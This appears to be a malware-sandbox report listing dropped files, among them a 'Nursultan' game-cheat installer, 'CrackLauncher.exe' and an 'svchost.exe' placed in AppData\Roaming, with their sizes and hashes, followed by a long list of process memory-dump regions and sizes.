C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b1964f71ab2b69655a2994782b875132

SHA1
0e548645cab1dda0c3d5d528393a08ce0b6fe6a5

SHA256
b9cef8300f65c804798ca1f4437408825d29f80429412a5bb8664284953b18f4

SHA512
54b47140ef4cf71f850e0852c66f01960c312f5c2bb476550d18bb1f5a3640f6eeb12b867d4057cd3d7c353820af2815fea5bb999cfcf6ca81d6e4882efbbf1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
aaf7b04e5be4bb88401156f4d8f34761

SHA1
f75e2c47377abdf27b1e2c4e73e69c5bff3e5171

SHA256
bf36186c9d6f77f6c8e2a728acea18d88c3e57de96724f4da7bca1c3068286a1

SHA512
3ca79af34fbd2b1167dce18e33ccb0c16f40f9306c27242ac878c60892ef2c01f2b6af4e01d3f0c251a54ab27b4228eab0bed0927a5fa0f8c09efb431c58ad56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
bcb4bbb1531c93c8bb72dfe947c111a7

SHA1
8dd388d15f8d0f39de79a248682b67a0617ea069

SHA256
0eab3d15bc1e82c559b068f396928633378e07dc299fbd8d54e6517e615131d0

SHA512
8a9964419f1aea9a06c692619c545089394407b0ca742611e1389051f69a2f432294e032ae8c53a5282b69f7dfbfe251fb8634f2898b5615c2dee741187a5f89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fa8d1461e4feb2c39654e3a555a027f8

SHA1
0ca46b8961ceba8f9da31de5ed2408643fc89141

SHA256
7e26e4f0ef3a7d2904818a691429789c4781029ff4aab697c3b7c9a4287d661f

SHA512
e486b8f029c7eec60b6b2b5603390330afb1ddf627cc01c511808c47e68676b4c429b9f75fd4e16e48b496dccfe8cc8ec4a35825e1e889e66571acb6c03e0869

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef72c47dbfaae0b9b0d09f22ad4afe20

SHA1
5357f66ba69b89440b99d4273b74221670129338

SHA256
692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

SHA512
7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

Filesize
102KB

MD5
c137c5f5287d73a94d55bc18df238303

SHA1
95b4b01775bea14feaaa462c98d969eb81696d2c

SHA256
d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0

SHA512
ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

Filesize
2.5MB

MD5
a1d8db2a1ff742bc73dd5617083f5fde

SHA1
957b182d82efb40a36099dd886ad581977880838

SHA256
d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a

SHA512
0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

Filesize
1.9MB

MD5
0df0a039309525fd27e1b5e056c92b6a

SHA1
7551c27a9123cb56c4218647966a753794ac2961

SHA256
a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f

SHA512
2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mrhdqp.xif.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

Filesize
229KB

MD5
f0b33cc162bfd36a995b8c90cd8ebff1

SHA1
ca1ddef08d47fc15a44a2d651b61e3decce8ebc6

SHA256
6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0

SHA512
1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
256KB

MD5
8fdf47e0ff70c40ed3a17014aeea4232

SHA1
e6256a0159688f0560b015da4d967f41cbf8c9bd

SHA256
ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82

SHA512
bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

Download Submit
memory/464-17-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

Filesize
10.8MB

Download
memory/464-14-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

Filesize
10.8MB

Download
memory/464-13-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

Filesize
10.8MB

Download
memory/464-12-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

Filesize
10.8MB

Download
memory/464-11-0x0000022CEAD90000-0x0000022CEADB2000-memory.dmp

Filesize
136KB

Download
memory/812-274-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-269-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-264-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-276-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-273-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-361-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-268-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-270-0x000001B194D50000-0x000001B194D70000-memory.dmp

Filesize
128KB

Download
memory/812-272-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-263-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-265-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-266-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-267-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/812-275-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1248-148-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1248-350-0x0000000006A60000-0x0000000006AF2000-memory.dmp

Filesize
584KB

Download
memory/1248-351-0x0000000006460000-0x000000000646A000-memory.dmp

Filesize
40KB

Download
memory/1976-335-0x0000000070890000-0x00000000708DC000-memory.dmp

Filesize
304KB

Download
memory/2128-1-0x0000000000480000-0x0000000000780000-memory.dmp

Filesize
3.0MB

Download
memory/2128-82-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

Filesize
10.8MB

Download
memory/2128-18-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

Filesize
10.8MB

Download
memory/2128-0-0x00007FF8AFBD3000-0x00007FF8AFBD5000-memory.dmp

Filesize
8KB

Download
memory/2944-237-0x00000196FE0B0000-0x00000196FE165000-memory.dmp

Filesize
724KB

Download
memory/2944-249-0x00000196FE300000-0x00000196FE30A000-memory.dmp

Filesize
40KB

Download
memory/2944-239-0x00000196FE080000-0x00000196FE08A000-memory.dmp

Filesize
40KB

Download
memory/2944-236-0x00000196FE090000-0x00000196FE0AC000-memory.dmp

Filesize
112KB

Download
memory/2944-242-0x00000196FE2D0000-0x00000196FE2EC000-memory.dmp

Filesize
112KB

Download
memory/2944-245-0x00000196FE2B0000-0x00000196FE2BA000-memory.dmp

Filesize
40KB

Download
memory/2944-246-0x00000196FE310000-0x00000196FE32A000-memory.dmp

Filesize
104KB

Download
memory/2944-247-0x00000196FE2C0000-0x00000196FE2C8000-memory.dmp

Filesize
32KB

Download
memory/2944-248-0x00000196FE2F0000-0x00000196FE2F6000-memory.dmp

Filesize
24KB

Download
memory/2972-356-0x0000000005760000-0x00000000058BA000-memory.dmp

Filesize
1.4MB

Download
memory/2972-355-0x00000000052E0000-0x00000000052FA000-memory.dmp

Filesize
104KB

Download
memory/2972-354-0x00000000005D0000-0x0000000000610000-memory.dmp

Filesize
256KB

Download
memory/3616-240-0x00000000076F0000-0x000000000770A000-memory.dmp

Filesize
104KB

Download
memory/3616-171-0x00000000054C0000-0x0000000005AE8000-memory.dmp

Filesize
6.2MB

Download
memory/3616-253-0x0000000007A00000-0x0000000007A14000-memory.dmp

Filesize
80KB

Download
memory/3616-254-0x0000000007A50000-0x0000000007A6A000-memory.dmp

Filesize
104KB

Download
memory/3616-170-0x0000000004E20000-0x0000000004E56000-memory.dmp

Filesize
216KB

Download
memory/3616-252-0x0000000007940000-0x000000000794E000-memory.dmp

Filesize
56KB

Download
memory/3616-244-0x0000000007920000-0x0000000007931000-memory.dmp

Filesize
68KB

Download
memory/3616-243-0x0000000007960000-0x00000000079F6000-memory.dmp

Filesize
600KB

Download
memory/3616-241-0x0000000007760000-0x000000000776A000-memory.dmp

Filesize
40KB

Download
memory/3616-238-0x0000000007D30000-0x00000000083AA000-memory.dmp

Filesize
6.5MB

Download
memory/3616-271-0x0000000007A30000-0x0000000007A38000-memory.dmp

Filesize
32KB

Download
memory/3616-226-0x00000000075F0000-0x0000000007693000-memory.dmp

Filesize
652KB

Download
memory/3616-225-0x00000000069C0000-0x00000000069DE000-memory.dmp

Filesize
120KB

Download
memory/3616-214-0x0000000006980000-0x00000000069B2000-memory.dmp

Filesize
200KB

Download
memory/3616-215-0x0000000070890000-0x00000000708DC000-memory.dmp

Filesize
304KB

Download
memory/3616-199-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/3616-200-0x0000000006410000-0x000000000645C000-memory.dmp

Filesize
304KB

Download
memory/3616-188-0x0000000005EC0000-0x0000000006214000-memory.dmp

Filesize
3.3MB

Download
memory/3616-178-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/3616-177-0x0000000005BF0000-0x0000000005C56000-memory.dmp

Filesize
408KB

Download
memory/3616-176-0x0000000005410000-0x0000000005432000-memory.dmp

Filesize
136KB

Download
memory/4244-147-0x0000000005C90000-0x0000000005D46000-memory.dmp

Filesize
728KB

Download
memory/4244-94-0x0000000000940000-0x0000000000B28000-memory.dmp

Filesize
1.9MB

Download
memory/4244-111-0x00000000054D0000-0x000000000556C000-memory.dmp

Filesize
624KB

Download
memory/4244-135-0x00000000061C0000-0x0000000006764000-memory.dmp

Filesize
5.6MB

Download
memory/4584-110-0x000001A8B6750000-0x000001A8B676E000-memory.dmp

Filesize
120KB

Download
memory/4584-154-0x000001A8B67C0000-0x000001A8B67D2000-memory.dmp

Filesize
72KB

Download
memory/4584-50-0x000001A8B4AC0000-0x000001A8B4B00000-memory.dmp

Filesize
256KB

Download
memory/4584-108-0x000001A8CF230000-0x000001A8CF2A6000-memory.dmp

Filesize
472KB

Download
memory/4584-109-0x000001A8CF2B0000-0x000001A8CF300000-memory.dmp

Filesize
320KB

Download
memory/4584-153-0x000001A8B6790000-0x000001A8B679A000-memory.dmp

Filesize
40KB

Download
memory/4600-259-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4600-262-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4600-255-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4600-256-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4600-258-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4600-257-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4816-314-0x0000000070890000-0x00000000708DC000-memory.dmp

Filesize
304KB

Download
memory/4816-308-0x0000000005E50000-0x00000000061A4000-memory.dmp

Filesize
3.3MB

Download
memory/4964-283-0x00000000060F0000-0x0000000006444000-memory.dmp

Filesize
3.3MB

Download
memory/4964-292-0x0000000070890000-0x00000000708DC000-memory.dmp

Filesize
304KB

Download